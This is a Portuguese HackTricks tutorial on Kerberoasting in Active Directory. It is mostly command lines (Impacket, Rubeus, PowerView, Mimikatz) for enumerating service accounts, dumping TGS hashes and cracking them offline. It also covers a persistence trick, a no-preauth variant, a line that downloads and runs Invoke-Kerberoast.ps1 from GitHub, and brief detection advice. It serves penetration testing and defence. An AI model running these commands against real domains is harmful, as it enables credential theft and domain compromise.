12 KiB
Kerberoast
Use Trickest para construir e automatizar fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.
Obtenha Acesso Hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do HackTricks e HackTricks Cloud.
Kerberoast
O objetivo do Kerberoasting é coletar tickets TGS para serviços que operam em nome de contas de usuários no AD, e não contas de computadores. Assim, parte desses tickets TGS são criptografados com chaves derivadas das senhas dos usuários. Como consequência, suas credenciais podem ser crackeadas offline.
Você pode saber que uma conta de usuário está sendo usada como um serviço porque a propriedade "ServicePrincipalName" é não nula.
Portanto, para realizar o Kerberoasting, é necessário apenas uma conta de domínio que possa solicitar TGSs, o que é possível para qualquer um, já que não são necessários privilégios especiais.
Você precisa de credenciais válidas dentro do domínio.
Ataque
{% hint style="warning" %}
As ferramentas de Kerberoasting geralmente solicitam criptografia RC4
ao realizar o ataque e iniciar solicitações de TGS-REQ. Isso ocorre porque o RC4 é mais fraco e mais fácil de ser crackeado offline usando ferramentas como Hashcat do que outros algoritmos de criptografia como AES-128 e AES-256.
Hashes RC4 (tipo 23) começam com $krb5tgs$23$*
enquanto AES-256(tipo 18) começam com $krb5tgs$18$*
.
{% endhint %}
Linux
# Metasploit framework
msf> use auxiliary/gather/get_user_spns
# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes
Ferramentas multifuncionais que incluem um dump de usuários suscetíveis ao Kerberoast:
# ADenum: https://github.com/SecuProject/ADenum
adenum -d <DOMAIN.FULL> -ip <DC_IP> -u <USERNAME> -p <PASSWORD> -c
Windows
- Enumerar usuários Kerberoastable
# Get Kerberoastable users
setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
Get-NetUser -SPN | select serviceprincipalname #Powerview
.\Rubeus.exe kerberoast /stats
- Técnica 1: Solicitar TGS e extrair da memória
#Get TGS in memory from a single user
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/mgmt.domain.local
#Get TGSs for ALL kerberoastable accounts (PCs included, not really smart)
setspn.exe -T DOMAIN_NAME.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
#List kerberos tickets in memory
klist
# Extract them from memory
Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current folder
# Transform kirbi ticket to john
python2.7 kirbi2john.py sqldev.kirbi
# Transform john to hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
- Técnica 2: Ferramentas automáticas
# Powerview: Get Kerberoast hash of a user
Request-SPNTicket -SPN "<SPN>" -Format Hashcat #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
# Powerview: Get all Kerberoast hashes
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation
# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap #Get of admins
# Invoke-Kerberoast
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
{% hint style="warning" %}
Quando um TGS é solicitado, o evento do Windows 4769 - A Kerberos service ticket was requested
é gerado.
{% endhint %}
Use Trickest para construir e automatizar workflows com o suporte das ferramentas comunitárias mais avançadas do mundo.
Obtenha Acesso Hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Cracking
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
Persistência
Se você tem permissões suficientes sobre um usuário, você pode torná-lo suscetível ao kerberoast:
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
Você pode encontrar ferramentas úteis para ataques kerberoast aqui: https://github.com/nidem/kerberoast
Se você encontrar este erro do Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
é por causa do seu horário local, você precisa sincronizar o host com o DC. Existem algumas opções:
ntpdate <IP do DC>
- Descontinuado a partir do Ubuntu 16.04rdate -n <IP do DC>
Mitigação
Kerberoast é muito discreto se explorável
- ID do Evento de Segurança 4769 – Um ticket Kerberos foi solicitado
- Como o 4769 é muito frequente, vamos filtrar os resultados:
- O nome do serviço não deve ser krbtgt
- O nome do serviço não termina com $ (para filtrar contas de máquina usadas para serviços)
- O nome da conta não deve ser maquina@dominio (para filtrar solicitações de máquinas)
- O código de falha é '0x0' (para filtrar falhas, 0x0 é sucesso)
- Mais importante, o tipo de criptografia do ticket é 0x17
- Mitigação:
- Senhas de Conta de Serviço devem ser difíceis de adivinhar (mais de 25 caracteres)
- Use Contas de Serviço Gerenciadas (mudança automática de senha periodicamente e gerenciamento de SPN delegado)
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
Kerberoast sem conta de domínio
Em setembro de 2022, uma vulnerabilidade foi descoberta por Charlie Clark, ST (Service Tickets) podem ser obtidos através de uma solicitação KRB_AS_REQ sem a necessidade de controlar qualquer conta do Active Directory. Se um principal pode se autenticar sem pré-autenticação (como no ataque AS-REP Roasting), é possível usá-lo para lançar uma solicitação KRB_AS_REQ e enganar a solicitação para pedir um ST em vez de um TGT criptografado, modificando o atributo sname na parte req-body da solicitação.
A técnica é explicada em detalhes neste artigo: Post do blog Semperis.
{% hint style="warning" %} Você deve fornecer uma lista de usuários porque não temos uma conta válida para consultar o LDAP usando esta técnica. {% endhint %}
Linux
GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/
Windows
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"
Mais informações sobre Kerberoasting em ired.team aquie aqui.
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo do 💬 Discord ou ao grupo do telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub HackTricks e HackTricks Cloud.
Use Trickest para construir e automatizar fluxos de trabalho facilmente, com as ferramentas comunitárias mais avançadas do mundo.
Obtenha Acesso Hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}